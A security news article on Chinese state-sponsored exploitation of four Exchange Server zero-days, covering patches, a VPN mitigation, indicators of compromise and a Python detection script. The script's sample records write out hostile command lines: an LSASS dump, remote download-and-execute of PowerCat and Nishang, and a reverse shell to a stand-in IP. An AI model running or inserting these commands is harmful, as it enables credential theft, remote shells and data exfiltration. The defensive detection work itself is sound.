- Microsoft has patched several 0-day flaws in Exchange Server that Chinese state-sponsored hackers were exploiting.
- The vulnerabilities were chained together to compromise servers, access mailbox data, and exfiltrate it.
- The attacks had been running for at least two months before the fix, so updating now is urgent.
Microsoft has confirmed that multiple 0-day vulnerabilities in Exchange Server are being actively exploited by an actor it tracks as “HAFNIUM,” a group that primarily targets US-based entities and is assessed to be state-sponsored and operating out of China.
While Microsoft describes the attacks as limited and targeted, they were very damaging: through compromised Exchange servers the attackers could read email from user accounts, install malware, and plant web shell backdoors that gave them persistent access and a foothold from which to move further into the network.
The newly disclosed 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which are addressed in the latest update. CVE-2021-26855 is a server-side request forgery (SSRF) that lets an unauthenticated attacker send arbitrary HTTP requests and authenticate as the Exchange server; CVE-2021-26857 is an insecure deserialization flaw in the Unified Messaging service; CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file writes. The affected Exchange Server versions are 2013, 2016, and 2019. Chaining these flaws into a single unauthenticated path to code execution is what makes the attack so effective, and it is indicative of the actors’ sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three are not related to the HAFNIUM attacks.
If you cannot apply the patch right now, Microsoft’s interim mitigation is to restrict untrusted connections, for example by placing the Exchange server behind a VPN so that it is not reachable directly from the internet. Note that this blocks only the first step of the attack chain, the untrusted connection to port 443 on the Exchange server that triggers the SSRF in CVE-2021-26855; the remaining flaws can still be exploited by an attacker who already has access to the server. It may still be enough to disrupt the campaign, but if the server has already been compromised this mitigation makes no difference whatsoever.
As Microsoft details, HAFNIUM performed the following post-exploitation activity:
- Used Procdump to dump the LSASS process memory
- Used 7-Zip to compress and exfiltrate stolen data
- Added and used Exchange PowerShell snap-ins to export mailbox data
- Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
- Downloaded PowerCat straight from GitHub and used it to open a connection to a remote server
Thus, if you administer an Exchange server, treat the above as signs of trouble and actively scan your logs for these indicators of compromise. If you find ZIP, RAR, or 7z archives under C:\ProgramData\, assume that data has been staged and exfiltrated. According to Microsoft, the actors also like to download the Exchange offline address book, which gives them organization and user information as well.
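As an added example (not Microsoft’s, Volexity’s, or this article’s own code), the following Python script turns the post-exploitation list above into detection rules and runs them over constructed sample process-creation records and a constructed file listing. The record fields (parent_image, image, command_line), the sample command lines, the IP addresses and the paths are all invented for this example; the only rule not taken from the article is the w3wp.exe-spawns-a-shell heuristic, a standard web shell indicator included because the attackers planted web shells on the compromised servers.

```python
"""Added example: detector for the HAFNIUM post-exploitation behaviours
listed in the article, run over constructed process-creation records and a
constructed file listing. The ProcEvent field names are an assumed shape
loosely modelled on Sysmon Event ID 1; adapt the loader to your own
Sysmon or EDR export. None of the sample data below is real telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # parent process image name or path
    image: str          # spawned process image name or path
    command_line: str   # full command line of the spawned process


# Behaviour rules derived from the post-exploitation list in the article.
# Each regex is matched case-insensitively against "<image> <command_line>".
RULES = [
    # Procdump dumping LSASS memory (credential theft)
    ("procdump_lsass", re.compile(r"procdump(?:64)?\.exe.*-ma\b.*lsass", re.I)),
    # 7-Zip *creating* an archive (staging for exfiltration); extraction ('x') is ignored
    ("7zip_archive_created", re.compile(r"\b7za?\.exe\s+a\b", re.I)),
    # Exchange PowerShell snap-in loaded, and a mailbox export requested
    ("exchange_snapin_loaded", re.compile(r"Add-PSSnapin\s+\S*Exchange\S*", re.I)),
    ("mailbox_export_request", re.compile(r"New-MailboxExportRequest", re.I)),
    # Nishang one-line reverse shell
    ("nishang_reverse_shell", re.compile(r"Invoke-PowerShellTcpOneLine", re.I)),
    # PowerCat fetched from GitHub or invoked
    ("powercat", re.compile(r"powercat", re.I)),
]

# Generic web shell indicator (assumption, not stated by the article): the IIS
# worker process spawning a command shell.
WEB_SHELL_PARENT = "w3wp.exe"
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Last path component, lower-cased; handles both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def match_rules(event: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers, in rule order."""
    text = f"{event.image} {event.command_line}"
    hits = [name for name, rx in RULES if rx.search(text)]
    if _basename(event.parent_image) == WEB_SHELL_PARENT and _basename(event.image) in SHELL_CHILDREN:
        hits.append("w3wp_spawns_shell")
    return hits


def scan_events(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rule names, only for events that match."""
    return {i: hits for i, e in enumerate(events) if (hits := match_rules(e))}


ARCHIVE_EXTENSIONS = (".zip", ".rar", ".7z")


def suspicious_archives(paths: list[str]) -> list[str]:
    """Archives anywhere under C:\\ProgramData, the staging location the article warns about."""
    hits = []
    for p in paths:
        norm = p.replace("/", "\\").lower()
        if norm.startswith("c:\\programdata\\") and norm.endswith(ARCHIVE_EXTENSIONS):
            hits.append(p)
    return hits


# Constructed sample telemetry for this example (IPs from the TEST-NET range).
SAMPLE_EVENTS = [
    ProcEvent("w3wp.exe", "cmd.exe",
              r'cmd.exe /c "procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp"'),
    ProcEvent("cmd.exe", "7z.exe",
              r"7z.exe a -pS3cret C:\ProgramData\export.7z C:\ProgramData\mail\*"),
    ProcEvent("w3wp.exe", "powershell.exe",
              "powershell.exe -c \"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; "
              "New-MailboxExportRequest -Mailbox ceo -FilePath \\\\localhost\\c$\\ProgramData\\ceo.pst\""),
    ProcEvent("cmd.exe", "powershell.exe",
              "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); "
              "powercat -c 203.0.113.5 -p 443 -e cmd\""),
    ProcEvent("w3wp.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'http://203.0.113.5/Invoke-PowerShellTcpOneLine.ps1')\""),
    ProcEvent("explorer.exe", "7z.exe", r"7z.exe x C:\Users\alice\Downloads\tools.zip"),  # benign
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),                    # benign
]

SAMPLE_PATHS = [
    r"C:\ProgramData\export.7z",
    r"C:\ProgramData\Microsoft\Windows\Caches\cache.dat",
    r"C:\ProgramData\it.zip",
    r"C:\Users\alice\Downloads\tools.zip",
    r"C:\ProgramData\nested\dump.rar",
]

if __name__ == "__main__":
    for idx, names in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx].command_line[:60]}")
    for path in suspicious_archives(SAMPLE_PATHS):
        print(f"archive in ProgramData: {path}")
```

The rules deliberately key on behaviour (LSASS targeted by a dumper, an archive being created, the Exchange snap-in plus an export request, the worker process spawning a shell) rather than on file hashes, so a renamed procdump or a re-hosted PowerCat still trips them; the 7-Zip rule ignores extraction so that ordinary admin use does not flood the results.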
If you find that you’re already under attack by HAFNIUM, check out this piece for how to build effective defenses. The most urgent action right now, though, is to update all externally facing Exchange Servers.
Finally, according to a blog post by Volexity, whose researchers discovered these attacks and reported them to Microsoft, the first signs of active exploitation of these flaws appeared as far back as January 6, 2021.